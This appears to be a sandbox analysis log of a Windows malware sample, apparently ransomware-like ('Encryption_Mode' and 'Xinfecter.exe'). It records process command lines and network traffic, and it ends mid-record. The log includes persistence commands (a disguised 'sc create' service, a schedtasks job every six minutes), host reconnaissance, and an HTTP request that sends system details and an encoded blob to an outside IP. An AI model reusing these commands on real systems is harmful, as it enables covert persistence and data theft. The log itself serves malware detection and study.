                                         Timestamp | Bytes transferred | Direction | Data
                                         Dec 6, 2024 13:51:22.269814968 CET | 82 | OUT | GET / HTTP/1.1
                                        Accept: text/*
                                        User-Agent: YourUserAgent
                                        Host: api.ipify.org
                                         Dec 6, 2024 13:51:23.362533092 CET | 429 | IN | HTTP/1.1 200 OK
                                        Date: Fri, 06 Dec 2024 12:51:23 GMT
                                        Content-Type: text/plain
                                        Content-Length: 12
                                        Connection: keep-alive
                                        Vary: Origin
                                        CF-Cache-Status: DYNAMIC
                                        Server: cloudflare
                                        CF-RAY: 8edc6835fa6a1891-EWR
                                        server-timing: cfL4;desc="?proto=TCP&rtt=1551&min_rtt=1551&rtt_var=775&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=82&delivery_rate=0&cwnd=170&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                        Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38
                                        Data Ascii: 8.46.123.228


                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                         1 | 192.168.2.5 | 49705 | 185.147.34.53 | 3586 | 7032 | C:\Users\user\Desktop\xKvkNk9SXR.exe
                                         Timestamp | Bytes transferred | Direction | Data
                                         Dec 6, 2024 13:51:24.769475937 CET | 2116 | OUT | GET /110_And_Netword_Drive_Size:0_Encryption_Mode:_Fast_Mode!Empty]_____03/10/2023,_10:57:18$_06/12/2024-_7:51:[Version_10.0.19045.2006|Microsoft_Windows_10_Prohg3l,8.46.123.228~L8acq3ctygn4C5b6XsaUC8NQ4T5+jxiCsWkp7x/Hk8Cz2BBRGk0mufLQ+PUY1typcKrEwbK2Dj7BO9JOfDPuCfh3CsC3iPhAH2eScIc+GWLNXN+3hyXaq6j2YSWd5DmTTvK1Az6Y2HJdeT6zGl6i1w+ZGQLwGzy8RkS4oEtlW3UuJVLTmwGlR7YDbEAsKmRmfH7DPy5LzBAQywMQRipuvv+48axKwRXjo8jTBYqVPUjVsSEjhbXPLzM9Xl8KyCm8GT5vtwes3vLmsHwAGVQYt6Us2UTzSBdT9pgorDIbhDIj1Cwk35gD0LXznaGhiEJiInYLHVLDOXOWJKdNgqc46lWqA4wW0VuMf3EPOyqU5rpjqgp8qxSxJhTR/wcyQd2HbUZA16pPJXIZoJe2SIn/JT5eC9QAvRwM3UCi7ivb9fYZVrSlTF/thYWe80fZkyufyRCmdKQMuTBl9xsnavY9+hVq8Hy7mV1PPur7n4Wyf3wUh282zBNauAhJEyGreiPNkuZJ7x23lcM7XkLwGJb+Z4BlO6ZDi8aGpDuEQ8BIOqcf6mibsCw76IMfx9ChQBZaIs/VJIp1jERwD7V0DV/sfzVGP7doUDNiAsVwLAgERAoIBAANZ6J65BfEayvAoTqwqRhcFFqY07Esp26rpBoYFzh2iqppj+Qg1XNIc/Jmj0Yftn+AG2OhuMtx1EgFqSORxKm4bD4Bc+HC3ieUp23T40yyqEl7a4CbuZyrGUzpLTN+qK+wwVpPcL3Fiib71SbOTkZ1Cfflb3YPpD32a7G9NLQO4qsiKmwpC0NllcV8ej/lQSlji5ByZD6jQYAleNgPKm44Km75DSkIkh [TRUNCATED]
                                        Host: 185.147.34.53
                                        Connection: close


                                        Target ID:0
                                        Start time:07:51:14
                                        Start date:06/12/2024
                                        Path:C:\Users\user\Desktop\xKvkNk9SXR.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\xKvkNk9SXR.exe"
                                        Imagebase:0x9b0000
                                        File size:1'257'984 bytes
                                        MD5 hash:603B398C14FFC8C0B647C58E9886C557
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:false

                                        Target ID:1
                                        Start time:07:51:14
                                        Start date:06/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        Target ID:2
                                        Start time:07:51:15
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
                                        Imagebase:0x790000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:3
                                        Start time:07:51:15
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                        Wow64 process (32bit):true
                                        Commandline:tasklist /v /fo csv
                                        Imagebase:0xee0000
                                        File size:79'360 bytes
                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:4
                                        Start time:07:51:15
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\findstr.exe
                                        Wow64 process (32bit):true
                                        Commandline:findstr /i "dcdcf"
                                        Imagebase:0x8f0000
                                        File size:29'696 bytes
                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:6
                                        Start time:07:51:16
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
                                        Imagebase:0x790000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:7
                                        Start time:07:51:17
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\sc.exe
                                        Wow64 process (32bit):true
                                        Commandline:sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
                                        Imagebase:0xea0000
                                        File size:61'440 bytes
                                        MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:8
                                        Start time:07:51:17
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
                                        Imagebase:0x790000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:9
                                        Start time:07:51:17
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\sc.exe
                                        Wow64 process (32bit):true
                                        Commandline:sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
                                        Imagebase:0xea0000
                                        File size:61'440 bytes
                                        MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:10
                                        Start time:07:51:17
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
                                        Imagebase:0x790000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:11
                                        Start time:07:51:17
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\sc.exe
                                        Wow64 process (32bit):true
                                        Commandline:sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
                                        Imagebase:0xea0000
                                        File size:61'440 bytes
                                        MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:12
                                        Start time:07:51:17
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c ver
                                        Imagebase:0x790000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:13
                                        Start time:07:51:17
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat
                                        Imagebase:0x790000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:14
                                        Start time:07:51:17
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\wscript.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
                                        Imagebase:0x2b0000
                                        File size:147'456 bytes
                                        MD5 hash:FF00E0480075B095948000BDC66E81F0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:15
                                        Start time:07:51:17
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f
                                        Imagebase:0x790000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:16
                                        Start time:07:51:17
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                        Wow64 process (32bit):true
                                        Commandline:schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f
                                        Imagebase:0x550000
                                        File size:187'904 bytes
                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:17
                                        Start time:07:51:18
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c echo %date%-%time%
                                        Imagebase:0x790000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:18
                                        Start time:07:51:18
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
                                        Imagebase:0x790000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:19
                                        Start time:07:51:18
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\systeminfo.exe
                                        Wow64 process (32bit):true
                                        Commandline:systeminfo
                                        Imagebase:0x520000
                                        File size:76'800 bytes
                                        MD5 hash:36CCB1FFAFD651F64A22B5DA0A1EA5C5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:20
                                        Start time:07:51:18
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
                                        Imagebase:0x790000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:21
                                        Start time:07:51:18
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\find.exe
                                        Wow64 process (32bit):true
                                        Commandline:find /i "os name"
                                        Imagebase:0x320000
                                        File size:14'848 bytes
                                        MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:22
                                        Start time:07:51:18
                                        Start date:06/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:23
                                        Start time:07:51:18
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                        Imagebase:0x970000
                                        File size:418'304 bytes
                                        MD5 hash:64ACA4F48771A5BA50CD50F2410632AD
                                        Has elevated privileges:true
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:24
                                        Start time:07:51:18
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
                                        Imagebase:0x790000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:25
                                        Start time:07:51:18
                                        Start date:06/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:false

                                        Target ID:26
                                        Start time:07:51:18
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                        Wow64 process (32bit):true
                                        Commandline:tasklist /v
                                        Imagebase:0xee0000
                                        File size:79'360 bytes
                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:27
                                        Start time:07:51:18
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\find.exe
                                        Wow64 process (32bit):true
                                        Commandline:find /I /c "dcdcf"
                                        Imagebase:0x320000
                                        File size:14'848 bytes
                                        MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:28
                                        Start time:07:51:20
                                        Start date:06/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\SYSTEM32\cmd.exe /c ""C:\Users\user\AppData\S-2153.bat""
                                        Imagebase:0x7ff73cba0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:29
                                        Start time:07:51:20
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"
                                        Imagebase:0x790000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:30
                                        Start time:07:51:20
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\systeminfo.exe
                                        Wow64 process (32bit):true
                                        Commandline:systeminfo
                                        Imagebase:0x520000
                                        File size:76'800 bytes
                                        MD5 hash:36CCB1FFAFD651F64A22B5DA0A1EA5C5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:31
                                        Start time:07:51:20
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\find.exe
                                        Wow64 process (32bit):true
                                        Commandline:find /i "original"
                                        Imagebase:0x320000
                                        File size:14'848 bytes
                                        MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:32
                                        Start time:07:51:20
                                        Start date:06/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:33
                                        Start time:07:51:20
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\timeout.exe
                                        Wow64 process (32bit):true
                                        Commandline:timeout /t 15 /nobreak
                                        Imagebase:0xd90000
                                        File size:25'088 bytes
                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:34
                                        Start time:07:51:20
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c ver
                                        Imagebase:0x790000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:35
                                        Start time:07:51:21
                                        Start date:06/12/2024
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs"
                                        Imagebase:0x7ff707060000
                                        File size:170'496 bytes
                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:36
                                        Start time:07:51:21
                                        Start date:06/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.bat
                                        Imagebase:0x7ff73cba0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:37
                                        Start time:07:51:21
                                        Start date:06/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:38
                                        Start time:07:51:22
                                        Start date:06/12/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "
                                        Imagebase:0x7ff73cba0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:39
                                        Start time:07:51:22
                                        Start date:06/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:40
                                        Start time:07:51:22
                                        Start date:06/12/2024
                                        Path:C:\Windows\System32\tasklist.exe
                                        Wow64 process (32bit):false
                                        Commandline:tasklist /v
                                        Imagebase:0x7ff6c6240000
                                        File size:106'496 bytes
                                        MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:41
                                        Start time:07:51:22
                                        Start date:06/12/2024
                                        Path:C:\Windows\System32\find.exe
                                        Wow64 process (32bit):false
                                        Commandline:find /I /c "dcdcf"
                                        Imagebase:0x7ff7bb170000
                                        File size:17'920 bytes
                                        MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:42
                                        Start time:07:51:28
                                        Start date:06/12/2024
                                        Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe"
                                        Imagebase:0x5a0000
                                        File size:1'257'984 bytes
                                        MD5 hash:603B398C14FFC8C0B647C58E9886C557
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 82%, ReversingLabs
                                        Has exited:true

                                        Target ID:43
                                        Start time:07:51:28
                                        Start date:06/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:45
                                        Start time:07:51:35
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                        Wow64 process (32bit):true
                                        Commandline:tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv
                                        Imagebase:0xee0000
                                        File size:79'360 bytes
                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:46
                                        Start time:07:51:35
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\find.exe
                                        Wow64 process (32bit):true
                                        Commandline:find /I "xKvkNk9SXR.exe"
                                        Imagebase:0x320000
                                        File size:14'848 bytes
                                        MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:47
                                        Start time:07:51:35
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\timeout.exe
                                        Wow64 process (32bit):true
                                        Commandline:timeout /t 15 /nobreak
                                        Imagebase:0xd90000
                                        File size:25'088 bytes
                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:48
                                        Start time:07:51:50
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                        Wow64 process (32bit):true
                                        Commandline:tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv
                                        Imagebase:0xee0000
                                        File size:79'360 bytes
                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:49
                                        Start time:07:51:50
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\find.exe
                                        Wow64 process (32bit):true
                                        Commandline:find /I "xKvkNk9SXR.exe"
                                        Imagebase:0x320000
                                        File size:14'848 bytes
                                        MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:50
                                        Start time:07:51:50
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\timeout.exe
                                        Wow64 process (32bit):true
                                        Commandline:timeout /t 15 /nobreak
                                        Imagebase:0xd90000
                                        File size:25'088 bytes
                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:52
                                        Start time:07:52:05
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                        Wow64 process (32bit):true
                                        Commandline:tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv
                                        Imagebase:0xee0000
                                        File size:79'360 bytes
                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:53
                                        Start time:07:52:05
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\find.exe
                                        Wow64 process (32bit):true
                                        Commandline:find /I "xKvkNk9SXR.exe"
                                        Imagebase:0x320000
                                        File size:14'848 bytes
                                        MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:54
                                        Start time:07:52:05
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\timeout.exe
                                        Wow64 process (32bit):true
                                        Commandline:timeout /t 15 /nobreak
                                        Imagebase:0xd90000
                                        File size:25'088 bytes
                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:55
                                        Start time:07:52:20
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                        Wow64 process (32bit):true
                                        Commandline:tasklist /fi "ImageName eq xKvkNk9SXR.exe" /fo csv
                                        Imagebase:0xee0000
                                        File size:79'360 bytes
                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:56
                                        Start time:07:52:20
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\find.exe
                                        Wow64 process (32bit):true
                                        Commandline:find /I "xKvkNk9SXR.exe"
                                        Imagebase:0x320000
                                        File size:14'848 bytes
                                        MD5 hash:15B158BC998EEF74CFDD27C44978AEA0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:57
                                        Start time:07:52:20
                                        Start date:06/12/2024
                                        Path:C:\Windows\SysWOW64\timeout.exe
                                        Wow64 process (32bit):true
                                        Commandline:timeout /t 15 /nobreak
                                        Imagebase:0xd90000
                                        File size:25'088 bytes
